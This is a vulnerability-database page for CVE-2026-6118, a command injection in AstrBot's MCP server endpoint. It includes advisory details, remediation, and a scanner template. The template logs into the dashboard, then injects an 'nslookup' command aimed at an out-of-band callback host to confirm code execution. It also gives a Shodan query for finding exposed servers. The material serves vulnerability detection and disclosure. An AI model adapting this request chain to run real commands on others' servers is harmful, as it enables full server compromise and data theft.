| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2026-6118 | 12 Apr 202604:45 | – | attackerkb | |
| CVE-2026-6118 | 12 Apr 202606:55 | – | circl | |
| AstrBot 命令注入漏洞 | 12 Apr 202600:00 | – | cnnvd | |
| CVE-2026-6118 | 12 Apr 202604:45 | – | cve | |
| CVE-2026-6118 AstrBotDevs AstrBot MCP Endpoint tools.py add_mcp_server command injection | 12 Apr 202604:45 | – | cvelist | |
| EUVD-2026-21712 | 12 Apr 202606:30 | – | euvd | |
| CVE-2026-6118 | 12 Apr 202605:16 | – | nvd | |
| CVE-2026-6118 AstrBotDevs AstrBot MCP Endpoint tools.py add_mcp_server command injection | 12 Apr 202604:45 | – | osv | |
| PT-2026-32150 | 12 Apr 202600:00 | – | ptsecurity | |
| CVE-2026-6118 | 14 Apr 202619:24 | – | redhatcve |
id: CVE-2026-6118
info:
name: AstrBot <= 4.22.1 - Command Injection
author: jyoti369
severity: high
description: |
AstrBot versions up to and including 4.22.1 contain a command injection vulnerability in the MCP server configuration endpoint. The /api/tools/mcp/add endpoint accepts arbitrary command and args fields that are passed directly to subprocess execution during the connection test, without any validation or allowlist enforcement. An attacker with dashboard access can execute arbitrary system commands with AstrBot process privileges.
impact: |
Authenticated attackers can execute arbitrary system commands, leading to full server compromise, data exfiltration, and lateral movement.
remediation: |
Upgrade AstrBot to version 4.22.2 or later which introduces command allowlisting and validation. Change default dashboard credentials immediately.
reference:
- https://github.com/AstrBotDevs/AstrBot/issues/7169
- https://nvd.nist.gov/vuln/detail/CVE-2026-6118
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2026-6118
epss-score: 0.02304
epss-percentile: 0.81264
cwe-id: CWE-94
metadata:
verified: true
max-request: 2
vendor: AstrBotDevs
product: AstrBot
shodan-query: title:"AstrBot"
tags: cve,cve2026,astrbot,rce,oast,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
POST /api/auth/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{username}}","password":"{{md5(password)}}"}
matchers:
- type: word
part: body
words:
- '"token"'
internal: true
extractors:
- type: regex
name: token
part: body
group: 1
regex:
- '"token"\s*:\s*"([^"]+)"'
internal: true
- raw:
- |
POST /api/tools/mcp/add HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: Bearer {{token}}
{"name":"{{randstr}}","command":"nslookup","args":["{{interactsh-url}}"],"active":false}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "status", "MCP connection test failed")'
- 'contains(interactsh_protocol, "dns")'
- 'status_code == 200'
condition: and
# digest: 490a004630440220758f551e927b8b094b12df90b8239d9aa1aedb81776b8b3d2c59bb20b8a638730220573033c45a74baa5380b3f71d98cd7831d1b1a94d457026d58f3d0210fdb8648:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation